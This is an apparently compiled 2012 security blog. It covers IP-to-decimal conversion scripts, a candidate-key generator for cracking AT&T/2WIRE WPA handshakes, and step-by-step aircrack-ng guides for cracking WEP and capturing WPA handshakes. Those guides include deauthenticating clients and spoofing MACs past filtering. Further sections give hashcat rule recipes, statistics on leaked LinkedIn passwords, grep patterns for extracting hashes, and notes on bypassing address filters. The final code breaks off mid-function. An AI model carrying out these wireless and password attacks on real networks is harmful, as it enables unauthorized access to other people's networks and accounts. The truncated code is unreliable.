Python Script: IP Address to 10-digit decimal to IP address

Friday, November 30, 2012

While poking at Android apps I learned today that an IPv4 address can be written as a single decimal number: the four octets read as one 32-bit value, so 192.168.1.1 becomes 3232235777. A browser accepts that form in a URL just like the dotted version. It is not always 10 digits (10.0.0.1 is 167772161); anything from 0 to 4294967295 is valid. I wrote two Python programs to go both ways ;)

I used http://www.iowight.com/iwindex/decimal.php3 for the math.

From 10-digit decimal to IP address:


#convert 10digit decimal formatted ipaddress to normal ipaddress
#by init6
#blog.init6.me

def main():
    #read file and convert each line to ip address. Comment out to ask for input.
    #raw string so backslashes in the Windows path are never read as escapes
    with open(r'c:\ipaddress.txt', 'r') as infile:
        for line in infile:
            line = line.strip()
            if line:
                print(convert(int(line)))
    #the with block closes the file; no explicit close needed

    #ask for input (dec format). Uncomment to ask for input.
    #decIn = int(input("Enter 10 digit decimal formatted ipaddress: "))
    #print(convert(decIn))

def convert(decIn):

    if is32(decIn):
        #zero-pad to exactly 8 hex digits. hex() drops leading zeros (0.1.2.3 gives
        #'0x10203') and lstrip("0x") would also eat a leading '0' digit, so the
        #pair slicing below would be off for any address whose first octet is below 16.
        fullHex = '{:08x}'.format(decIn)

        #Split hex number into four pairs
        hex1 = fullHex[0:2]
        hex2 = fullHex[2:4]
        hex3 = fullHex[4:6]
        hex4 = fullHex[6:8]
        #Convert each hex pair to decimal, then to a string, and return the ip address.
        ipAddr = ( str(int(hex1,16)) + '.' + str(int(hex2,16)) + '.' + str(int(hex3,16)) + '.' + str(int(hex4,16)) )
        return ipAddr
    return None

#Checks that the input is a non-negative int of 32 bits or less, i.e. a valid ip address.
def is32(n):
    try:
        bitstring = bin(n)
    except (TypeError, ValueError):
        return False

    if n >= 0 and len(bitstring[2:]) <= 32:
        return True
    else:
        print("Not a valid 32bit 10 digit decimal")
        return False

if __name__ == '__main__':
    main()


From IP address to 10-digit decimal:


#convert ip address to a 10digit decimal formatted ipaddress.
#by init6
#blog.init6.me

try:
    input = raw_input   #Python 2: raw_input returns a string, like Python 3's input()
except NameError:
    pass

def main():
    ipAddr = input("Type in IP Address to convert to 10digit decimal: ")
    print(convert(ipAddr))

def convert(ipAddr):
    out = ipAddr.strip().split('.')
    if len(out) != 4:
        raise ValueError("expected four dotted octets, got %r" % ipAddr)
    octets = [int(o) for o in out]
    if any(o < 0 or o > 255 for o in octets):
        raise ValueError("octet out of range in %r" % ipAddr)
    #pack the four octets as eight hex digits, then read them back as one number
    hexNum = '{:02X}{:02X}{:02X}{:02X}'.format(*octets)
    return int(hexNum, 16)

if __name__ == '__main__':
    main()
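An added example, not from the original post: the same two conversions done with the standard library, plus a parser for the other spellings that a browser or inet_aton(3) accepts for the same address (hex 0xC0A80101, octal 0300.0250.1.1, and short forms such as 127.1 or 192.168.257 where the last part fills the remaining bytes). The function names and the sample values are my own. The strict `ipaddress` module rejects every one of those alternate forms, which is exactly why an address check built on a strict parser can disagree with what the connecting code resolves.

```python
import ipaddress


def ip_to_dword(dotted):
    """Dotted quad -> 32-bit integer (the post's '10 digit decimal' form)."""
    return int(ipaddress.IPv4Address(dotted))


def dword_to_ip(value):
    """32-bit integer -> dotted quad. Rejects anything outside 0..2**32-1."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit value: %r" % value)
    return str(ipaddress.IPv4Address(value))


def _part_to_int(part):
    # inet_aton number syntax: 0x.. is hex, a leading 0 is octal, otherwise decimal.
    if part[:2].lower() == '0x':
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == '0':
        return int(part, 8)
    return int(part, 10)


def normalize(text):
    """Emulate inet_aton(3)/browser parsing: 1 to 4 dot-separated parts, each
    decimal, hex or octal; the last part fills every remaining byte. Returns the
    canonical dotted quad, or raises ValueError."""
    parts = text.strip().split('.')
    if not 1 <= len(parts) <= 4 or not all(parts):
        raise ValueError("bad address syntax: %r" % text)
    nums = [_part_to_int(p) for p in parts]
    head, last = nums[:-1], nums[-1]
    if any(n > 0xFF for n in head):
        raise ValueError("leading part exceeds one byte: %r" % text)
    tail_bytes = 4 - len(head)          # bytes the last part has to cover
    if last >= 256 ** tail_bytes:
        raise ValueError("last part too large for %d byte(s): %r" % (tail_bytes, text))
    value = 0
    for n in head:
        value = (value << 8) | n
    value = (value << (8 * tail_bytes)) | last
    return dword_to_ip(value)


def is_valid(text):
    """True if the liberal parser above accepts the text."""
    try:
        normalize(text)
        return True
    except ValueError:
        return False


def strict_accepts(text):
    """True if the strict parser (ipaddress module) accepts the text."""
    try:
        ipaddress.IPv4Address(text)
        return True
    except ValueError:
        return False


if __name__ == '__main__':
    # constructed inputs, all naming 192.168.1.1 except the last two
    for sample in ('192.168.1.1', '3232235777', '0xC0A80101',
                   '0300.0250.1.1', '192.168.257', '127.1', '10.0.0.1'):
        print('%-16s -> %-12s dword %d  strict=%s' % (
            sample, normalize(sample), ip_to_dword(normalize(sample)),
            strict_accepts(sample)))
```

The practical point: a filter that only matches dotted quads, or validates with a strict parser, passes the decimal, hex and short forms untouched while the socket layer still resolves them to the same host. Normalize first, then check.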

UPDATE: CMYIP

Thursday, November 29, 2012

cmyip.com changed the way they encode the numbers, so I could no longer pull the IP address straight from the page source. Rather than decoding the HTML numeric character references back to ASCII (not only is it a pain, they also have it set up to change the encoding), grab the source, render it through the w3m text browser, dump it back out to the terminal and grep for the IP address.

http://pastie.org/5454850


#!/bin/bash
# render the page as text first so the entity-encoded digits come out as plain digits
ip_addr=$(curl -s http://cmyip.com | w3m -T text/html -dump | grep -o -E '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}')
echo "$ip_addr"

UPDATE: Cracking 2WIRE WPA1/2

Tuesday, October 23, 2012

My previous post had a few problems with the script. I updated the script to work properly: http://pastie.org/5101804  However, it was still way too slow. I asked around and found the following solution.

http://pastie.org/5104479



#Python 3
#Name: 2wire.py
#by: INIT_6
#Count from 0000000000 - 9999999999 skipping any number that repeats a digit three or more times in a row, like 333

import sys
from threading import Thread

def count1(first, ver):
    #999000000..999999999 all start with '999', so they would be skipped anyway
    MAX_INT = 999000000
    BAD_PATTERNS = {x * 3 for x in '0123456789'}
    # Use xrange for Python 2.7
    for number in range(MAX_INT):
        int_string = str(number).rjust(9, '0')
        if any(pattern in int_string for pattern in BAD_PATTERNS):
            continue
        #one write per line so the ten threads cannot interleave half-written keys
        sys.stdout.write(str(first) + int_string + '\n')

if __name__ == '__main__':
    #one thread per leading digit
    for x in '0123456789':
        try:
            Thread(target=count1, args=(x,1)).start()
        except Exception as errtxt:
            print(errtxt)


I still have some work to do. I need to test the threading better and set up a queue so it only starts as many threads as the computer can handle.

My Method for cracking WEP

Friday, October 19, 2012

There are hundreds if not thousands of guides out there on how to crack WEP. This will mostly be a quick and dirty reference guide for a few friends trying to crack WEP themselves.

Aircrack-ng's guide to cracking WEP

Download and boot off BackTrack 5 R3. To install it on a flash drive use the Linux/Windows tool YUMI.

First you want to see what wifi networks you have to choose from. Put your wireless interface in monitor mode.

#airmon-zc start wlan0 
#airodump-ng --encrypt wep mon0

You should see several APs. Record the BSSID, ESSID and channel, along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, close airodump and stop airmon.

#airmon-zc stop mon0 

Start airmon-zc on the channel of the target. (With WEP it is not as necessary to lock the driver to the channel as it is with WPA, but it does no harm.)

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wep --ivs --write <FILENAME> --output-format pcap -a --channel <Channel number>


Now you need to associate with the access point (fake authentication). This does not produce IVs by itself, but the AP only accepts injected frames from an associated station, so it is what makes the replay attack below work. -h sets the source MAC you inject as; using the MAC of a client that is already associated also gets you past MAC filtering.

#aireplay-ng mon0 -1 0 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 

If the above isn't working you might need to tweak your command line: re-associate every N seconds (-1 N), send fewer packets per burst (-o) and keep-alives every 10 seconds (-q 10).

#aireplay-ng mon0 -1 <a number between 30-6000> -o <a number between 1-30> -q 10 -e "essid" -a <access point MAC address> -h <MAC address of an associated client> 



Success looks like this (output borrowed from http://www.aircrack-ng.org):
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.
Here is an example of what a failed authentication looks like:
18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request


You can also do an ARP request replay attack, either at the same time as or instead of the above. This is what actually generates the IVs: captured ARP requests are replayed to the AP, and every reply is a freshly encrypted frame with a new IV.

#aireplay-ng mon0 -3 -b <MAC address of Access point> -h <MAC address of associated client>


Here is what the screen looks like when ARP requests are being injected:
 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


Now to crack the IVs you have obtained. There are a lot of different options at this point. For example, the AT&T U-verse default WEP key is digits only and the Verizon FiOS default is 0-9A-F. Doing some homework on the default SSID might lead to a quicker crack.


Static WEP cracking options:
-c     Search alphanumeric characters only.

-t      Search binary-coded decimal characters only.

-n <nbits>
Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc., until 512 bits of length. The default value is 128.

-f <fudge>
By default, this parameter is set to 2. Use a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.

-k <korek>
There are 17 KoreK attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.


#aircrack-ng <any static WEP cracking options above> <filename>.cap

It will ask you to select the network you want to crack and show how many IVs it currently has. 

I only use the -f 1 option to get keys that are too easy and would otherwise be treated as false positives, e.g. 123456789 or 111111111.

And remember, a few quick Google searches on the SSID (if it is a default SSID) can save you a lot of time. 

Side note: if you run

#iwconfig wlan0

and the transmit power isn't set correctly for your gear, you can change it (the value is in dBm) with:

#iwconfig wlan0 txpower <dBm>


This is not a complete guide to everything you can do. It is just what I do, and it has a high success rate. If you have any questions feel free to drop me an e-mail/Gtalk at init6@init6.me 


Part 2. Cracking AT&T WPA1/2

Monday, September 24, 2012

Part 2. Cracking AT&T WPA1/2 with a Python script and hashcat.

Once you have the four-way handshake from part 1:

My Python script can be found here. It creates a CPU pool based on how many cores you have. Based on Python 2.7.3 and Linux.

What the script does is count from 0000000000 to 9999999999, skipping any number that has the same digit three times in a row, so you won't get keys like 1234555678 because it repeats 5 three times. AT&T decided to make their numbers "too random", and that cuts the keyspace down. It is faster to count through and jump past the repeating numbers than to test each number individually.

To change where the program starts, open it and change the following line to whatever you want:

start = str(7)

To run the program, pipe it into hashcat-plus:

python 2wireWPAiter.py | ./oclHashcat-plus64.bin -m 2500 -a 0 --gpu-accel=160 --gpu-loops=1024 ../dir/2WIREHandShake.hccap


With AMD driver 12.8 and SDK 2.7 I get about 86K keys per second. With the built-in brute force I get 114K keys per second. Still working on how to improve my output speed. 

To get more info on hashcat look here.

A straight brute force on a known key starting with 7 saved over an hour.

[Screenshots: with script / without script]


Someone in the hashcat room just told me a better way of doing this to make it even faster and more accurate: using http://hashcat.net/wiki/doku.php?id=statsprocessor to make a hcstat file, utilizing Markov chains. I will do this later tonight and post my results.

Edit: you can't use Markov chains with hashcat for this. 
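The candidate generator below is an added example of mine, not the script from this post or the 2wire.py from the "UPDATE: Cracking 2WIRE WPA1/2" post above; it serves both. Instead of testing every number for a repeated digit, it notices where the first triple sits and jumps straight past every number that shares that prefix (all of 0001xxxxxx contain "000", so the next candidate after any of them is 0010000000). It also computes, from the recurrence a(n) = 9*(a(n-1) + a(n-2)), how many n-digit strings have no run of three equal digits, which is the size of the reduced keyspace. The function names and the command-line start argument are my own.

```python
import sys


def _first_triple(s):
    """Index of the first run of three identical digits in s, or None."""
    for i in range(len(s) - 2):
        if s[i] == s[i + 1] == s[i + 2]:
            return i
    return None


def candidates(width=10, start=0):
    """Yield, in order, every zero-padded `width`-digit number >= start that has
    no digit repeated three times in a row. On a hit, jump past the whole block
    that shares the offending prefix instead of testing each number in it."""
    limit = 10 ** width
    n = start
    while n < limit:
        s = str(n).zfill(width)
        i = _first_triple(s)
        if i is None:
            yield s
            n += 1
        else:
            # every number with the same (i+3)-digit prefix contains this triple,
            # so continue at prefix+1 followed by zeros
            n = (int(s[:i + 3]) + 1) * 10 ** (width - i - 3)


def count_without_triples(width):
    """Number of `width`-digit strings with no run of three equal digits:
    a(1) = 10, a(2) = 100, a(n) = 9 * (a(n-1) + a(n-2))."""
    if width == 1:
        return 10
    if width == 2:
        return 100
    a_prev, a_cur = 10, 100
    for _ in range(width - 2):
        a_prev, a_cur = a_cur, 9 * (a_cur + a_prev)
    return a_cur


def keyspace_fraction(width=10):
    """Share of the full 10**width space that survives the triple filter."""
    return count_without_triples(width) / float(10 ** width)


if __name__ == '__main__':
    # usage: python 2wire_keys.py [start]   e.g. 7000000000 to begin at keys starting with 7
    start = int(sys.argv[1]) if len(sys.argv) > 1 else 0
    out = sys.stdout
    for key in candidates(10, start):
        out.write(key + '\n')
```

Pipe it into hashcat exactly as the post does (`python 2wire_keys.py 7000000000 | ./oclHashcat-plus64.bin -m 2500 -a 0 ... handshake.hccap`). One number worth knowing before choosing this over the built-in brute force: of the 10^10 ten-digit keys, 9282568410 contain no triple, so the filter removes only about 7% of the space, and the post's own figures (86K/s through the pipe against 114K/s built in) show the pipe, not the filter, sets the rate.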

PART 1: Cracking AT&T WPA1/2

Part 1. Getting the handshake.

Aircrack's site has a pretty good tutorial.

Boot from BackTrack 5 R3.

First you want to see what wifi networks you have to choose from. Put your wireless interface in monitor mode.

#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0 

You should see several APs. Record the BSSID and channel, along with any associated clients shown at the bottom of airodump-ng.

Once you find a couple of targets on the same channel, close airodump and stop airmon.

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write FILENAME --output-format pcap -a --channel <Channel number>

The channel number needs to be the same as your target's so you capture the full four-way handshake between the client and the AP. Airodump shows "WPA handshake" in the top right-hand corner once it has one.

Instead of waiting around for a client to connect, you can deauthenticate a client and wait for it to reconnect automatically.

#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0


Where:
  • -0 means deauthentication
  • 5 is the number of deauths to send
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • mon0 is the interface name

If you are using BackTrack you can easily check your .pcap file for a proper handshake with pyrit, or load it in Wireshark and filter on eapol, which I will show in a future post.

#pyrit -r FILENAME.pcap analyze 

The output tells you whether you have a good EAPOL handshake, a workable one, or nothing at all if none is found.

To strip everything out of your pcap file except the handshakes, run the following:

#pyrit -r FILENAME.pcap -o OUTPUT.pcap strip

To turn your pcap file into a hashcat-plus friendly .hccap file you can upload it to https://hashcat.net/cap2hccap/ or follow the steps they give to convert it yourself. I just use their site.



Hashcat Rules

Sunday, August 12, 2012

Link to information about hashcat's rule-based attack.

Besides the out-of-the-box rules and some of the amazing rules atom and his team come up with, I will be updating this post from time to time, adding new rules I come up with or that others give me the idea for.

malik51 and I were talking. I was trying to get ?d?s prepended and appended to a password, since running two rules, one appending and one prepending, is slow and doesn't work. After much frustration I had one good idea, which I will share below. His solution:

./mp64.bin -1 ?d?s '$?1 $?1 Y2 }}' -o malik51roll2.rule
./mp64.bin -1 ?d?s '$?1 $?1 $?1 Y3 }}}' -o malik51roll3.rule

This adds the same characters to both sides: !@pass!@ or 123pass123. (Append the two characters, Y2 duplicates the last two, and each } rotates the word right one position, carrying the copy round to the front.) Works great, and it's fast.

However, I wanted more. I wanted passwords like 1@pass$% or 123pass#$%. What I thought was the solution to the above actually works for this. It first reverses the pass (ssap), appends the digit or special character (ssap@1), then reverses the word again (1@pass). Finally it appends the next set to get 1@pass$%.

./mp64.bin -1 ?d?s 'r $?1 $?1 r $?1 $?1' -o init6reverse.rule

However, this only works for two positions; you can't do 123pass#$%, the rule set is just too big.

In the spirit of the malik51roll2.rule I made the ldsUroll.rule:
./mp64.bin -1 ?l?d?s?u '$?1 $?1 Y2 }}' -o ldsUroll.rule
It appends and prepends lowercase, digits, specials and uppercase.
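To see exactly what mp64 writes out and what hashcat then does with it, here is an added example of mine (not part of the post, and not hashcat's or maskprocessor's code): a mask expander that turns a rule template with ?1-style placeholders into the Cartesian product of concrete rule lines, and an interpreter for just the rule functions used on this page ($X, ^X, r, d, YN, }, {, l, u, :). The ?s charset is the 33-character hashcat one; the function names are my own.

```python
import itertools
import string

# Built-in charsets as hashcat/maskprocessor define them (?a is the union of the four).
CHARSETS = {
    'l': string.ascii_lowercase,
    'u': string.ascii_uppercase,
    'd': string.digits,
    's': ' !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~',
}
CHARSETS['a'] = CHARSETS['l'] + CHARSETS['u'] + CHARSETS['d'] + CHARSETS['s']


def expand_charset(spec, custom):
    """Resolve a charset spec such as '?d?s' or '123456' into its characters.
    `custom` maps '1'..'4' to the specs given with -1 .. -4 (which may themselves use ?d etc.)."""
    out = []
    i = 0
    while i < len(spec):
        if spec[i] == '?' and i + 1 < len(spec):
            key = spec[i + 1]
            if key == '?':
                out.append('?')
            elif key in custom:
                out.append(expand_charset(custom[key], custom))
            else:
                out.append(CHARSETS[key])
            i += 2
        else:
            out.append(spec[i])
            i += 1
    return ''.join(out)


def expand_mask(mask, custom=None):
    """Yield every string the mask describes (what `mp64 -1 ... 'mask'` prints):
    one line per element of the Cartesian product of the mask's positions."""
    custom = custom or {}
    slots = []
    i = 0
    while i < len(mask):
        if mask[i] == '?' and i + 1 < len(mask):
            slots.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    for combo in itertools.product(*slots):
        yield ''.join(combo)


def apply_rule(rule, word):
    """Apply one hashcat rule line to a word. Functions are read left to right;
    spaces and ':' are no-ops, '$'/'^' take the next character literally (so
    '$ ' appends a space), Y/N positions are 0-9 then A-Z."""
    w = word
    i = 0
    while i < len(rule):
        f = rule[i]
        i += 1
        if f in ' :':
            continue
        if f == '$':
            w = w + rule[i]; i += 1
        elif f == '^':
            w = rule[i] + w; i += 1
        elif f == 'r':
            w = w[::-1]
        elif f == 'd':
            w = w + w
        elif f == 'Y':
            n = int(rule[i], 36); i += 1
            if n:
                w = w + w[-n:]
        elif f == '}':
            w = w[-1:] + w[:-1]          # rotate right
        elif f == '{':
            w = w[1:] + w[:1]            # rotate left
        elif f == 'l':
            w = w.lower()
        elif f == 'u':
            w = w.upper()
        else:
            raise ValueError('unsupported rule function %r in %r' % (f, rule))
    return w


def run_rules(words, rules):
    """Candidates from every (rule, word) pair, deduplicated, order preserved."""
    seen, out = set(), []
    for rule in rules:
        for word in words:
            c = apply_rule(rule, word)
            if c not in seen:
                seen.add(c)
                out.append(c)
    return out


if __name__ == '__main__':
    roll2 = list(expand_mask('$?1 $?1 Y2 }}', {'1': '?d?s'}))
    print(len(roll2), 'rules;', roll2[0], '->', apply_rule(roll2[0], 'pass'))
    print(apply_rule('r $@ $1 r $$ $%', 'pass'))
```

Tracing `$1 $2 Y2 }}` on pass gives pass1 , pass12, pass1212, 2pass121, 12pass12, which is why a single rule line can touch both ends. The count matters too: with ?1 = ?d?s (43 characters) roll2 is 43^2 = 1849 rules and roll3 is 43^3 = 79507, which is the "too big" the post runs into at three positions.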


EDIT: 8/12/2012 4:13AM

The following haven't found that many, but they found some.


bible verse numbers:

./mp64.bin -1 123456 -2 12 '$: $?d $?d' -o biblenum1.rule
./mp64.bin -1 123456 -2 12 '$: $1 $?d $?d' -o biblenum2.rule
./mp64.bin -1 123456 -2 12 '$  $: $?d $?d' -o biblenum1a.rule
./mp64.bin -1 123456 -2 12 '$  $: $1 $?d $?d' -o biblenum2a.rule
./mp64.bin -1 123456 -2 12 '$?d $: $?d $?d' -o biblenum3.rule
./mp64.bin -1 123456 -2 12 '$?d $: $1 $?d $?d' -o biblenum4.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $?d $?d $?d' -o biblenum5.rule
./mp64.bin -1 123456 -2 12 '$?1 $?d $: $1 $?d $?d $?d' -o biblenum6.rule
./mp64.bin -1 123456 -2 12 '$1 $5 $0 $: $?2 $?d $?d $?d' -o biblenum7.rule

cat biblenum*.rule > bible.rule



Append a colon followed by 1-3 characters of anything:

./mp64.bin -1 ?d?s?l?u '$: $?1' -o append1.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1' -o append2.rule
./mp64.bin -1 ?d?s?l?u '$: $?1 $?1 $?1' -o append3.rule

cat append*.rule > append.rule



Append a clock time, both 12 and 24 hour:

./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d' -o clock.rule

#haven't tried this, most likely too large.
./mp64.bin -1 12 -2 1234 -3 12345 '$?1 $?2 $: $?3 $?d $: $?d $?d' -o clockSeconds.rule




Linkedin Passwords Analysed

Thursday, August 9, 2012

Number of LinkedIn passwords analysed: 4,769,941

Passpal.rb output. See the full report here. 

I also ran some other reports. The report for just the masked hashes, the ones with the first 5 characters zeroed out, can be found here.
The report for just the normal hashes, without the zeroed-out characters, can be found here. 


Base word (len>=3) frequency, sorted by count, top 20
+-----------------------------+
|   Word   | Count | Of total |
+-----------------------------+
| linkedin |  3674 | 0.077 %  |
| link     |  2282 | 0.0478 % |
| linked   |  1905 | 0.0399 % |
| alex     |  1089 | 0.0228 % |
| mike     |  1075 | 0.0225 % |
| may      |  1032 | 0.0216 % |
| love     |   967 | 0.0203 % |
| Linkedin |   865 | 0.0181 % |
| june     |   860 | 0.018 %  |
| john     |   852 | 0.0179 % |
| blue     |   788 | 0.0165 % |
| jan      |   765 | 0.016 %  |
| jack     |   746 | 0.0156 % |
| july     |   709 | 0.0149 % |
| password |   701 | 0.0147 % |
| sam      |   695 | 0.0146 % |
| pass     |   693 | 0.0145 % |
| chris    |   663 | 0.0139 % |
| mark     |   628 | 0.0132 % |
| dec      |   624 | 0.0131 % |
+-----------------------------+

Length frequency, sorted by length, full table
+------------------------------+
| Length |  Count  | Of total  |
+------------------------------+
|      1 |      28 | 0.0006 %  |
|      2 |      25 | 0.0005 %  |
|      3 |      23 | 0.0005 %  |
|      4 |       5 | 0.0001 %  |
|      5 |       2 | 0.0 %     |
|      6 |  578859 | 12.1354 % |
|      7 |  596636 | 12.5081 % |
|      8 | 1567986 | 32.8718 % |
|      9 |  822634 | 17.246 %  |
|     10 |  567261 | 11.8923 % |
|     11 |  290798 | 6.0964 %  |
|     12 |  174207 | 3.6521 %  |
|     13 |   87247 | 1.8291 %  |
|     14 |   49301 | 1.0336 %  |
|     15 |   23493 | 0.4925 %  |
|     16 |    9970 | 0.209 %   |
|     17 |     801 | 0.0168 %  |
|     18 |     383 | 0.008 %   |
|     19 |     161 | 0.0034 %  |
|     20 |      81 | 0.0017 %  |
+------------------------------+


Charset frequency, sorted by count, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+

Charset frequency, sorted by count/keyspace, full table
+-------------------------------------------------------------------------+
|           Charset            |  Count  | Of total  |   Count/keyspace   |
+-------------------------------------------------------------------------+
| lower-numeric                | 3402358 | 71.3283 % |  94509.94444444444 |
| lower-upper-numeric          | 4320927 | 90.5855 % |  69692.37096774194 |
| lower-numeric-symbolic       | 3605939 | 75.5962 % | 52259.985507246376 |
| lower-upper-numeric-symbolic | 4707243 | 98.6844 % | 49549.926315789475 |
| lower                        | 1055703 | 22.1321 % |  40603.96153846154 |
| lower-upper                  | 1202678 | 25.2134 % | 23128.423076923078 |
| numeric                      |  200999 | 4.2138 %  |            20099.9 |
| lower-symbolic               | 1104595 | 23.1571 % | 18721.949152542373 |
| lower-upper-symbolic         | 1275390 | 26.7377 % | 15004.588235294117 |
| upper-numeric                |  286005 | 5.9959 %  |  7944.583333333333 |
| numeric-symbolic             |  204379 | 4.2847 %  |             4753.0 |
| upper-numeric-symbolic       |  299598 | 6.2809 %  |             4342.0 |
| upper                        |   26797 | 0.5618 %  | 1030.6538461538462 |
| upper-symbolic               |   28394 | 0.5953 %  |  481.2542372881356 |
| symbolic                     |     133 | 0.0028 %  |   4.03030303030303 |
+-------------------------------------------------------------------------+


Total characters: 40923061
Unique characters: 343
Top 50 characters: ae1inrosl02tmd3cuhk947b85gp6yjfvwzxASML!BR@CTEDNPI

Character frequency, sorted by count, top 20
+--------------------------------+
| Character |  Count  | Of total |
+--------------------------------+
| a         | 3018713 | 7.3766 % |
| e         | 2503293 | 6.1171 % |
| 1         | 2021211 | 4.9391 % |
| i         | 2015863 | 4.926 %  |
| n         | 1894225 | 4.6287 % |
| r         | 1760160 | 4.3011 % |
| o         | 1723761 | 4.2122 % |

Symbol frequency, sorted by count, top 20
+-----------------+
| Symbol | Count  |
+-----------------+
| !      | 111239 |
| @      | 100945 |
| #      |  44236 |
| .      |  43380 |
| *      |  40449 |
| _      |  32678 |
| -      |  29112 |
| &      |  14655 |


Finding Hashes

Monday, July 23, 2012


To search for SHA-1 in a file:
grep -o -E "\b[0-9a-f]{40}\b" FILE | sort | uniq > all-SHA1

To search for SHA-256 in a file:
grep -o -E "\b[0-9a-f]{64}\b" FILE | sort | uniq > all-SHA256

To search for SHA-512 in a file:
grep -o -E "\b[0-9a-f]{128}\b" FILE | sort | uniq > all-SHA512

To search for MD5 in a file:
grep -o -E "\b[0-9a-f]{32}\b" FILE | sort | uniq > all-md5

To search for MD5crypt in a file:
grep '^\$1\$' FILE | cut -d: -f2- | sort | uniq > all-md5crypt

To search for NTLM in a file:
grep -o -E ':\$NT\$[[:alnum:]]{32}:' FILE | sort | uniq > all-NTLM
grep -o -E ':\$NT\$[[:alnum:]]{30,34}:' FILE | sort | uniq > all-NTLM

Two things to watch: use plain uniq (or sort -u), not uniq -u, which prints only the lines that occur exactly once and so silently drops every hash that appears twice in the file (a shared password). And the \b word boundaries matter: without them the 32-character pattern also matches the first 32 characters of every SHA-1, SHA-256 and SHA-512 in the file, so the MD5 list fills up with truncated longer digests.
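An added example, not from the post: the same search done in one pass in Python, with the boundary and duplicate-count problems handled, and with the pwdump and John `$NT$` formats recognised so an NT hash is not filed as MD5. Length only narrows the algorithm (32 hex digits is MD5, NTLM or MD4; 40 is SHA-1 or RIPEMD-160), so the buckets are named accordingly. The sample lines are constructed; the MD5, SHA-1, SHA-256 and NT digests are those of the word "password", the md5crypt string is just syntactically valid. Names are mine.

```python
import re
from collections import Counter, defaultdict

# hex-digest length -> what commonly produces it (length alone is not proof)
HEX_LENGTHS = {32: 'md5/ntlm', 40: 'sha1', 64: 'sha256', 128: 'sha512'}

# \b on both ends: otherwise a 32-digit pattern also matches the first 32 digits of a
# 40-, 64- or 128-digit token. The greedy range grabs the whole token; its length is
# then looked up, so a 36-digit hex token is ignored rather than truncated.
HEX_RE = re.compile(r'\b[0-9a-fA-F]{32,128}\b')
MD5CRYPT_RE = re.compile(r'\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}')
PWDUMP_RE = re.compile(r'^[^:]+:\d+:([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::')
JTR_NT_RE = re.compile(r'\$NT\$([0-9a-fA-F]{32})')

# constructed input, one record per line
SAMPLE = """\
alice:5f4dcc3b5aa765d61d8327deb882cf99
bob:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
carol:$1$saltsalt$qjXMvbEw8oaL.CzflDtaK/
dave:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
erin:$NT$8846f7eaee8fb117ad06bdd830b7586c
frank:5f4dcc3b5aa765d61d8327deb882cf99
grace:5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
"""


def find_hashes(lines):
    """Return {kind: Counter(hash -> occurrences)}. Counting keeps the hashes that
    appear more than once, which is the information `uniq -u` throws away."""
    found = defaultdict(Counter)
    for line in lines:
        line = line.strip()
        m = PWDUMP_RE.match(line)
        if m:                                   # user:rid:LM:NT::: takes the whole line
            found['lm'][m.group(1).lower()] += 1
            found['ntlm'][m.group(2).lower()] += 1
            continue
        for m in MD5CRYPT_RE.finditer(line):
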